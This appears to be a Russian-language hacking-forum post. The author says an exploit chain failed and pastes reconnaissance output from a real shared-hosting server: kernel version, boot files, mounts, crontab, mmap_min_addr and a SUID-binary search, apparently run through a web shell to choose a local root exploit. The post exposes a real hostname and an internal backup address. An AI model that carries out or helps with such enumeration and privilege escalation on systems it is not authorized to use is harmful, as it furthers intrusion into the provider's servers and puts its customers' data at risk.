Такие дела. Пробовал связку. Но меня послало. Code: $ uname -a Linux fortuna.timeweb.ru 3.10.82-timeweb #1 SMP Fri Jul 3 10:11:34 MSK 2015 x86_64 x86_64 x86_64 GNU/Linux $ ls -la /boot total 153444 drwxr-xr-x 3 root root 4096 Oct 8 06:28 . drwxr-xr-x 28 root root 4096 Jul 21 06:26 .. -rw-r--r-- 1 root root 3210565 Aug 26 2014 System.map-3.10.53-timeweb -rw-r--r-- 1 root root 3210844 Oct 16 2014 System.map-3.10.58-timeweb -rw-r--r-- 1 root root 3213729 Mar 3 2015 System.map-3.10.70-timeweb -rw-r--r-- 1 root root 3213988 Jul 3 10:49 System.map-3.10.82-timeweb -rw-r--r-- 1 root root 3214012 Oct 7 13:05 System.map-3.10.90-timeweb -rw-r--r-- 1 root root 2911687 May 20 2013 System.map-3.2.45-timeweb -rw-r--r-- 1 root root 132942 Aug 26 2014 config-3.10.53-timeweb -rw-r--r-- 1 root root 133622 Oct 16 2014 config-3.10.58-timeweb -rw-r--r-- 1 root root 134094 Mar 3 2015 config-3.10.70-timeweb -rw-r--r-- 1 root root 134094 Jul 3 10:00 config-3.10.82-timeweb -rw-r--r-- 1 root root 134094 Oct 7 12:17 config-3.10.90-timeweb -rw-r--r-- 1 root root 129458 May 20 2013 config-3.2.45-timeweb drwxr-xr-x 3 root root 12288 Oct 8 06:28 grub -rw-r--r-- 1 root root 16856878 Sep 16 2014 initrd.img-3.10.53-timeweb -rw-r--r-- 1 root root 17273047 Feb 18 2015 initrd.img-3.10.58-timeweb -rw-r--r-- 1 root root 17273539 Mar 18 2015 initrd.img-3.10.70-timeweb -rw-r--r-- 1 root root 17273177 Sep 29 06:25 initrd.img-3.10.82-timeweb -rw-r--r-- 1 root root 17272293 Oct 8 06:28 initrd.img-3.10.90-timeweb -rw-r--r-- 1 root root 15767803 Sep 18 2013 initrd.img-3.2.45-timeweb -rw-r--r-- 1 root root 176764 Nov 27 2011 memtest86+.bin -rw-r--r-- 1 root root 178944 Nov 27 2011 memtest86+_multiboot.bin -rw-r--r-- 1 root root 5939488 Aug 26 2014 vmlinuz-3.10.53-timeweb -rw-r--r-- 1 root root 5941120 Oct 16 2014 vmlinuz-3.10.58-timeweb -rw-r--r-- 1 root root 5948224 Mar 3 2015 vmlinuz-3.10.70-timeweb -rw-r--r-- 1 root root 5949952 Jul 3 10:49 vmlinuz-3.10.82-timeweb -rw-r--r-- 1 root root 5951264 Oct 7 13:05
vmlinuz-3.10.90-timeweb -rw-r--r-- 1 root root 5480816 May 20 2013 vmlinuz-3.2.45-timeweb $ lls -la --full-time /lib64 $ lls -la --full-time /lib $ mount /dev/sda1 on / type ext4 (rw,errors=remount-ro) proc on /proc type proc (rw,noexec,nosuid,nodev) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) none on /sys/fs/fuse/connections type fusectl (rw) none on /sys/kernel/debug type debugfs (rw) none on /sys/kernel/security type securityfs (rw) udev on /dev type devtmpfs (rw,mode=0755) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620) none on /tmp type tmpfs (rw,noexec,nosuid,nodev,noatime,size=4g) tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755) none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880) none on /run/shm type tmpfs (rw,nosuid,nodev) none on /var/spool/exim4 type tmpfs (rw,noexec,nosuid,nodev,noatime,size=1g) /dev/drbd0 on /home type ext4 (rw,nosuid,noatime,nodiratime,usrjquota=aquota.user,jqfmt=vfsv0,usrquota,discard,_netdev) //172.16.0.30/homes on /mnt/backup type cifs (rw,noexec,nosuid,nodev) $ df -h Filesystem Size Used Avail Use% Mounted on /dev/sda1 46G 24G 20G 55% / udev 32G 12K 32G 1% /dev none 4.0G 579M 3.5G 15% /tmp tmpfs 6.3G 336K 6.3G 1% /run none 5.0M 0 5.0M 0% /run/lock none 32G 24K 32G 1% /run/shm none 1.0G 7.7M 1017M 1% /var/spool/exim4 /dev/drbd0 1.5T 1.3T 170G 88% /home $ cat /etc/issue Ubuntu 12.04.5 LTS \n \l $ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. 
SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # $ ls -la cron.d total 36 drwxr-xr-x 2 root root 4096 Jul 16 2014 . drwxr-xr-x 138 root root 12288 Oct 8 21:02 .. -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder -rw-r--r-- 1 root root 589 Apr 11 2013 mdadm -rw-r--r-- 1 root root 499 Aug 9 2013 php5 -rw-r----- 1 root root 116 Jul 16 2014 puppet_agent_restart -rw-r--r-- 1 root root 396 Dec 16 2011 sysstat $ ls -la cron.hourly total 20 drwxr-xr-x 2 root root 4096 Aug 22 2013 . drwxr-xr-x 138 root root 12288 Oct 8 21:02 .. -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder $ ls -la cron.monthly total 28 drwxr-xr-x 2 root root 4096 Aug 23 2013 . drwxr-xr-x 138 root root 12288 Oct 8 21:02 .. -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder -rwxr-xr-x 1 root root 1281 May 6 2011 acct -rwxr-xr-x 1 root root 534 Mar 8 2012 debsums $ ls -la cron.weekly total 32 drwxr-xr-x 2 root root 4096 Oct 10 2014 . drwxr-xr-x 138 root root 12288 Oct 8 21:02 .. 
-rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder -rwxr-xr-x 1 root root 730 Dec 31 2011 apt-xapian-index -rwxr-xr-x 1 root root 533 Mar 8 2012 debsums -rwxr-xr-x 1 root root 907 Dec 28 2012 man-db $ cat /proc/version Linux version 3.10.82-timeweb ([email protected]) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #1 SMP Fri Jul 3 10:11:34 MSK 2015 $ cat /proc/sys/vm/mmap_min_addr 65536 $ pwd /etc $ ls -la /usr/bin/staprun $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null -rwsr-xr-x 1 root root 31304 Mar 2 2012 /bin/fusermount -rwsr-xr-x 1 root root 35712 Nov 8 2011 /bin/ping -rwsr-xr-x 1 root root 36832 Sep 13 2012 /bin/su -rwsr-xr-x 1 root root 40256 Nov 8 2011 /bin/ping6 -rwsr-xr-x 1 root root 94792 Jun 18 2014 /bin/mount -rwsr-xr-x 1 root root 69096 Jun 18 2014 /bin/umount -rwsr-xr-x 1 root root 32232 May 17 2013 /sbin/mount.cifs -rwsr-xr-x 1 root root 62400 Jul 29 2011 /usr/bin/mtr -rwsr-xr-x 1 root root 37096 Sep 13 2012 /usr/bin/chsh -rwsr-xr-x 2 root root 71280 Mar 12 2015 /usr/bin/sudoedit -rwsr-xr-x 2 root root 71280 Mar 12 2015 /usr/bin/sudo -rwsr-xr-x 1 root root 42824 Sep 13 2012 /usr/bin/passwd -rwsr-xr-x 1 root root 41832 Sep 13 2012 /usr/bin/chfn -rwsr-sr-x 1 daemon daemon 47928 Oct 25 2011 /usr/bin/at -rwsr-xr-x 1 root root 35712 Nov 8 2009 /usr/bin/tcptraceroute.mt -rwsr-xr-x 1 root root 32352 Sep 13 2012 /usr/bin/newgrp -rwsr-xr-x 1 root root 63848 Sep 13 2012 /usr/bin/gpasswd -rwsr-xr-x 1 root root 18912 Nov 8 2011 /usr/bin/traceroute6.iputils -rwsr-xr-- 1 root dip 321552 Apr 21 20:33 /usr/sbin/pppd -r-sr-x--- 1 root customers 940632 Dec 28 2012 /usr/sbin/exim4 -rwsr-x--- 1 _lldpd adm 55640 Nov 27 2011 /usr/sbin/lldpctl -rwsr-sr-x 1 libuuid libuuid 18856 Jun 18 2014 /usr/sbin/uuidd -rwsr-xr-x 1 root root 10592 Mar 26 2015 /usr/lib/pt_chown -rwsr-xr-- 1 root messagebus 292944 Nov 25 2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 10408 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 
240984 Aug 18 05:13 /usr/lib/openssh/ssh-keysign $